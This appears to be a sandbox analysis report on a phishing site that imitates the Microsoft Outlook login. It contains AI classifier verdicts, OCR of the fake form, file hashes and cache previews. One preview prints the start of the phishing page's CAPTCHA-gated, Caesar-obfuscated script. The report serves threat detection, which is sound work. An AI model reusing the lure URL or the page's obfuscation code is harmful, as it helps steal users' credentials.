                                                            URL: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc29 Model: Perplexity: mixtral-8x7b-instruct
                                                            {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","There is no text that creates a sense of urgency.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                                            Title: siiw0ioenr OCR: Outlook Microsoft Sign in to continue to Outlook We couldn't find an account with that username. Try another, or get a new Microsoft account. trumpsucksdick@mail.ru No account? Create one! Can't access pur account? Next Sign-in options Terms of use Privacy &
                                                            URL: https://happylifedon.com Model: gpt-4o
                                                            ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": false,  "legitmate_domain": "outlook.com",  "reasons": "The URL 'https://happylifedon.com' does not match the legitimate domain for Microsoft Outlook, which is 'outlook.com'. The page displays a prominent login form, which is a common tactic used in phishing attacks. The domain name 'happylifedon.com' is unrelated to Microsoft or Outlook, making it highly suspicious. The page uses social engineering techniques by mimicking the Outlook login page to deceive users into entering their credentials. There is no CAPTCHA present on the page. Based on these factors, the site is highly likely to be a phishing site."}
                                                            URL: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc29 Model: Perplexity: mixtral-8x7b-instruct
                                                            {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as passwords and email addresses.","There is no sense of urgency created in the text.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                                            Title: siiw0ioenr OCR: Outlook Microsoft Sign in to continue to Outlook james6zking No account? Create one! Can't access your account? Next Sign-in options Terms of use Privacy &
                                                            URL: https://happylifedon.com Model: gpt-4o
                                                            ```json{  "phishing_score": 9,  "brands": "Microsoft Outlook",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": false,  "legitmate_domain": "outlook.com",  "reasons": "The URL 'https://happylifedon.com' does not match the legitimate domain for Microsoft Outlook, which is 'outlook.com'. The webpage closely resembles the legitimate Outlook login page, which is a common tactic used in phishing attacks to deceive users into entering their credentials. The presence of a prominent login form and the use of Microsoft's branding further suggest an attempt to mislead users. There are no captchas present, which is often a feature in legitimate login pages to prevent automated attacks. The domain name 'happylifedon.com' is highly suspicious and unrelated to Microsoft Outlook, indicating a high likelihood of phishing."}

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jul 3 14:49:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2673
                                                            Entropy (8bit):3.993377801296265
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:177942E678957C06B9C1E45BAA0EB226
                                                            SHA1:39F9D5480D16A8E29DC17C9FEAC6FA1D2C428F65
                                                            SHA-256:B5A4F7196CD41CF1FA2DAC0A11CB09F01CA2CEF44E30ABFAFA09D4F774DE7B05
                                                            SHA-512:36985BAAC9B7D3B8B0873933D85128FCBCCF8301DBEF3DF908293CDB9FDE3368607FD064154AC534060DFDE54CAF4ED1F823FDBBD205CA82A194E878D2EA36EC
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,.....NB.`...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X#~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X#~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X$~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jul 3 14:49:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2675
                                                            Entropy (8bit):4.006876700317925
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:49DBE55939E2A19F1DDF50B0325B261C
                                                            SHA1:5522862959F2FF95E536808568FDAE6DD97B3072
                                                            SHA-256:BD44C35980784CC91BBE68CEB9A3307ECB0FFE5F8AB9E7637B4B88213E625009
                                                            SHA-512:840C82E5084002A9101FA82CF7066E40C0432CE00926C4B4914B22CA6D40A0C7D81D1599A834572E17D6D6451B67FE045D7A7F919A8A1ED53DB65679A3D8568E
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,.....g6.`...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X#~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X#~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X$~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2689
                                                            Entropy (8bit):4.01461795868742
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:ADB2E17F61760BAB5F63109E086CC6D6
                                                            SHA1:A1A1C3CA2176284CEF3E14102EA525EB6C64D714
                                                            SHA-256:19C1F860D9D00E29004364F7C8FD27B564CDA38B1F9BE86A743A9D783E107D00
                                                            SHA-512:589C7147AEA73695EC2CC0D2C24856F65CC581D35804C7D8A382C6987021CE25FE6DEF4D1AEA999CF122507FDD817537141E58AA55DC6503897859696FE0C0B8
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X#~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X#~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jul 3 14:49:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2677
                                                            Entropy (8bit):4.008458961512894
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0C7E1B53B0E3DFE8DE27C8E8090B23F8
                                                            SHA1:21DFBA828AF732EB571074643B0BF0DA58FA98D1
                                                            SHA-256:EF14E299C75822994802D6D32F2A7E1CB0880A0D31E1808DFA5885B4D3120E91
                                                            SHA-512:7F5632DC02691657962E760356E6EEF5A58761D4442E5E5AC21B7190910B03EAA45CA7F9F7092B2A40D858F9FEC38061B303E6F86E25E58FCD8C1DBA3980F639
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,......!.`...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X#~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X#~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X$~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jul 3 14:49:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2677
                                                            Entropy (8bit):3.9943399120883165
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:DE8B1159F1088EBBD48A2CFB35271CC3
                                                            SHA1:EC0BD9505A89BEE12D57957A371058021EC06606
                                                            SHA-256:BE0D669C20BC7CE0C32117C91C07E926DEE1F32CFB3B89F9230575F0218EC1B4
                                                            SHA-512:96ACC8DAC119127B23BB370403944C62C200E7A9E9C5D7EE11D8850690119FA239E0A37297374471CE30106E1454814783C2264EDAA814A1DDD2E8CE4181474E
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,....p.<.`...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X#~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X#~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X$~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jul 3 14:49:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2679
                                                            Entropy (8bit):4.005926192846413
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:CE3A64E5C46AA1B90BF0AC0C6C3D4655
                                                            SHA1:861BC6C687A61B2CCB4D3EC476A042E9BCF20B20
                                                            SHA-256:3D7513A333AA88AF96A3ACF4654233BE49BFB11A187484B978F44781EC00FD0F
                                                            SHA-512:FAA0172E69C940310DF2122FEEEDE9E9990E0B459390E03A0B4AA0D94ABB55C32B1D3D76934239B08161ABFF13F2755F062EC2FF072F846938E7CD8D4A9C74C8
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,.....B..`...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X#~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X#~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X$~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            Chrome Cache Entry: 147

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 31 x 58, 8-bit/color RGB, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):61
                                                            Entropy (8bit):4.068159130770306
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:CD96822E30D488A6A2F16A02711F2FC3
                                                            SHA1:BAC62A60290983F89EC0E3A79FAC98C5386A05A7
                                                            SHA-256:483F204D4DEBC326A6652D14EB390CAECFFA609F268AC9E20B0B9A14D52387E2
                                                            SHA-512:473DDE80E982260034410AD08E8B203EC417DE3393878094991B0C6AD54D1BE442F45C112D32FF33721229CBD9BC9F98FAE5373C01F6301784AA275E67B38E78
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d8062a18697c9c/1720021753169/wpSNSXnOxywaJD5
                                                            Preview:.PNG........IHDR.......:............IDAT.....$.....IEND.B`.

                                                            Chrome Cache Entry: 149

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (1899)
                                                            Category:downloaded
                                                            Size (bytes):5741
                                                            Entropy (8bit):5.368494299665408
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5F492260F3F7CB180C3432458AA03FC4
                                                            SHA1:099E1F899F68FA12E7BE5B6B3EDF14E76475118E
                                                            SHA-256:852FEBDE99850A5CBEA9465E2A85301726DFE49CC71C49C0783194B66B7D0D31
                                                            SHA-512:44576A70E4D9BA144159F49BA4F75A01AEC8FE610AF1B68337522D7FED6CE5777E6DE0BAA5435365BCD04019128BF33764AF3F863F04F0804992EE7A653F70BF
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://74a4acd7.5eca4a6b0b2ee89fe739b742.workers.dev/favicon.ico
                                                            Preview:<!doctype html>.<html lang="en-US">.<head> . <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> . <title>Just a moment...</title> . <meta content="width=device-width,initial-scale=1" name="viewport"> . <script>. var verifyCallback_CF = function (response) {. if (response && response.length > 10) {. sendRequest(); // Only send the request after CAPTCHA is solved. }. };.. window.onloadTurnstileCallback = function () {. turnstile.render("#turnstileCaptcha", {. sitekey: "0x4AAAAAAAdVmX4Y8IG49PoL", . callback: verifyCallback_CF,. });. };.. function hh2(encryptedText, shift) {. let decryptedText = "";. for (let i = 0; i < encryptedText.length; i++) {. let c = encryptedText[i];. if (c.match(/[a-z]/i)) {. let code = encryptedText.charCodeAt(i);. if ((code >= 65) && (code <= 90)) {. c = String.fromCharCode(((code -

                                                            Chrome Cache Entry: 151

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65339), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):659798
                                                            Entropy (8bit):5.352921769071548
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9786D38346567E5E93C7D03B06E3EA2D
                                                            SHA1:23EF8C59C5C9AA5290865933B29C9C56AB62E3B0
                                                            SHA-256:263307E3FE285C85CB77CF5BA69092531CE07B7641BF316EF496DCB5733AF76C
                                                            SHA-512:4962CDF483281AB39D339A7DA105A88ADDB9C210C9E36EA5E36611D7135D19FEC8B3C9DBA3E97ABB36D580F194F1860813071FD6CBEDE85D3E88952D099D6805
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://r4.res.office365.com/owa/prem/15.20.7741.25/scripts/boot.worldwide.1.mouse.js
                                                            Preview:.window.scriptsLoaded = window.scriptsLoaded || {}; window.scriptProcessStart = window.scriptProcessStart || {}; window.scriptProcessStart['boot.worldwide.1.mouse.js'] = (new Date()).getTime();..;_a.d.G=function(n,t){this.b=n;this.a=t};_a.d.G.prototype={b:0,a:0};_a.fo=function(n){this.s=n};_a.fo.prototype={s:null,t:null,i:function(){return this.s.currentTarget},e:function(){return this.t?this.t.x:this.s.pageX},f:function(){return this.t?this.t.y:this.s.pageY},o:function(){return this.s.relatedTarget},b:function(){return this.s.target},n:function(){return this.s.timeStamp||+new Date},a:function(){var n=this.s.which;!n&&_a.o.a().K&&this.s.type==="keypress"&&(n=this.u());return n},u:function(){return this.s.keyCode},m:function(){return this.s.originalEvent},j:function(){return this.s.type},k:function(){return this.s.originalEvent.touches},q:function(){return this.s.isDefaultPrevented()},g:function(){return this.s.shiftKey},h:function(){return _j.G.a().P?this.s.metaKey:this.s.ctrlKey},l:

                                                            Chrome Cache Entry: 153

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (3437), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):3439
                                                            Entropy (8bit):5.12253249098629
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:6635D7000669B3B00D3577DB7EE58F5D
                                                            SHA1:7DB793D847EDC78B731185C85AD93BA4761D139B
                                                            SHA-256:4E52043A45804E7CDB6C9D09A0F64A4293082E6F32BB3D689BE4822A6E18BACB
                                                            SHA-512:FE3D01776B8D98E975D4DB6E956196B0D5602563E0252BD960A5A739D591F3AC96F5F2EF48EF6B49286822D80106932C104B324BD355EBE1D2FEFCB124D5866B
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://login.live.com/Me.htm?v=3
                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.

                                                            Chrome Cache Entry: 155

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):232394
                                                            Entropy (8bit):5.54543362321178
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:AF8D946B64D139A380CF3A1C27BDBEB0
                                                            SHA1:C76845B6FFEAF14450795C550260EB618ABD60AB
                                                            SHA-256:37619B16288166CC76403F0B7DF6586349B2D5628DE00D5850C815D019B17904
                                                            SHA-512:C5CFB514F993310676E834C8A5477576BD57C82A8665387F9909BA0D4C3C2DE693E738ACAA74E7B4CA20894EA2FEEA5CF9A2428767D03FE1DE9C84538FDC3EE9
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://r4.res.office365.com/owa/prem/15.20.7741.25/resources/styles/0/boot.worldwide.mouse.css
                                                            Preview:.feedbackList{-webkit-animation-duration:.17s;-moz-animation-duration:.17s;animation-duration:.17s;-webkit-animation-name:feedbackListFrames;-moz-animation-name:feedbackListFrames;animation-name:feedbackListFrames;-webkit-animation-fill-mode:both;-moz-animation-fill-mode:both;animation-fill-mode:both}@-webkit-keyframes feedbackListFrames{from{-webkit-transform:scale(1,1);transform:scale(1,1);-webkit-animation-timing-function:cubic-bezier(.33,0,.67,1);animation-timing-function:cubic-bezier(.33,0,.67,1)}to{-webkit-transform:scale(1.03,1.03);transform:scale(1.03,1.03)}}@-moz-keyframes feedbackListFrames{from{-moz-transform:scale(1,1);transform:scale(1,1);-moz-animation-timing-function:cubic-bezier(.33,0,.67,1);animation-timing-function:cubic-bezier(.33,0,.67,1)}to{-moz-transform:scale(1.03,1.03);transform:scale(1.03,1.03)}}@keyframes feedbackListFrames{from{-webkit-transform:scale(1,1);-moz-transform:scale(1,1);transform:scale(1,1);-webkit-animation-timing-function:cubic-bezier(.33,0,.67,

                                                            Chrome Cache Entry: 157

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65470)
                                                            Category:downloaded
                                                            Size (bytes):912017
                                                            Entropy (8bit):5.414635876106438
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C055B54826187E9BFAD668452523BA80
                                                            SHA1:33B9642B9C83F69640C4DC83EA34A47F8B347A41
                                                            SHA-256:AC96990B2665B91FD7FBBABDAB21EEEF5CBA8EBB93ECB802970B03B3C4733106
                                                            SHA-512:6E1BB67C0B970B76573D9E6A255654846A35F7E08E5FE13E652F3D4745ADBB127D3B0649A2C1826C127C3F325190B88AF09FE4226C7C4E7A3F4B0D3D7158C25E
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://logincdn.msftauth.net/shared/5/js/login_en_wFW1SCYYfpv61mhFJSO6gA2.js
                                                            Preview:/*! For license information please see login_en.js.LICENSE.txt */.!function(){var e,t,n,r,o,i={97206:function(e,t,n){"use strict";var r=n(9384),o={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},i={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},a={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},l={};function s(e){return r.isMemo(e)?a:l[e.$$typeof]||o}l[r.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},l[r.Memo]=a;var c=Object.defineProperty,u=Object.getOwnPropertyNames,d=Object.getOwnPropertySymbols,f=Object.getOwnPropertyDescriptor,p=Object.getPrototypeOf,g=Object.prototype;e.exports=function e(t,n,r){if("string"!=typeof n){if(g){var o=p(n);o&&o!==g&&e(t,o,r)}var a=u(n);d&&(a=a.concat(d(n)));for(var l=s(t),m=s(n),h=0;h<a.length;++h){var b=a[h];if(!(i[b]||r&&r[

                                                            Chrome Cache Entry: 158

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=paint.net 4.2.9], baseline, precision 8, 50x28, components 3
                                                            Category:dropped
                                                            Size (bytes):987
                                                            Entropy (8bit):6.922003634904799
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E58AAFC980614A9CD7796BEA7B5EA8F0
                                                            SHA1:D4CAC92DCDE0CAF7C571E6D791101DA94FDBD2CA
                                                            SHA-256:8B34A475187302935336BF43A2BF2A4E0ADB9A1E87953EA51F6FCF0EF52A4A1D
                                                            SHA-512:2DAC06596A11263DF1CFAB03EDA26D0A67B9A4C3BAA6FB6129CDBF0A157C648F5B0F5859B5CA689EFDF80F946BF4D854BA2B2C66877C5CE3897D72148741FCC9
                                                            Malicious:false
                                                            Reputation:unknown
